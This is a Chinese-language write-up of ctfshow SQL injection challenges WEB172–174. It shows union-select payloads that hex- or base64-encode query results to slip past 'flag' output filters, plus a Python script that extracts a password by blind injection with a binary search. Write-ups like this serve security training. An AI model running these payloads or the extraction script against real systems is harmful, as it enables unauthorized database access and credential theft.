WEB172

查询语句

//拼接sql语句查找指定ID用户
sql = “select username,password from ctfshow_user2 where username !=‘flag’ and id = '”.$_GET[‘id’]."’ limit 1;";

返回逻辑

//检查结果是否有flag
if($row->username!==‘flag’){
$ret[‘msg’]=‘查询成功’;
}

这里说我们返回的语句中不能包含flag内容。
我们可以绕过

1’ union select hex(username),password from ctfshow_user2–+

在这里插入图片描述

WEB173

查询语句

//拼接sql语句查找指定ID用户
sql = “select id,username,password from ctfshow_user3 where username !=‘flag’ and id = '”.$_GET[‘id’]."’ limit 1;";

返回逻辑

//检查结果是否有flag
if(!preg_match(’/flag/i’, json_encode($ret))){
$ret[‘msg’]=‘查询成功’;
}

相对上一题就是多了json_encode
在这里插入图片描述
可以用编码形式绕过，这里可以用到两个函数
hex : 转16进制
to_base64 : 转base64

1’ union select 1,hex(username),to_base64(password) from ctfshow_user3–+

在这里插入图片描述

WEB174

查询语句

//拼接sql语句查找指定ID用户
sql = “select id,username,password from ctfshow_user2 where username !=‘flag’ and id = '”.$_GET[‘id’]."’ limit 1;";

返回逻辑

//检查结果是否有flag
if(!preg_match(’/flag/i’, json_encode($ret))){
$ret[‘msg’]=‘查询成功’;
}

输入1’ and 1=1#
在这里插入图片描述
输入1’ and 1=0#

从这里就可以分析出来有时间盲注，先看看有没有联合注入，发现没有回显只能时间盲注。

这里直接放代码。

import requests

url = "http://2a29bdb8-5bf5-4d82-9391-24cc6beacd48.challenge.ctf.show:8080/api/v4.php?id=1' and "

result = ""
i = 0

while True:
    i = i+1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        payload = f"1=if((ascii( substr((select password from ctfshow_user4 limit 24,1),{i},1))>{mid}),1,0)--+"
        r = requests.get(url+payload)
        if 'admin' in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)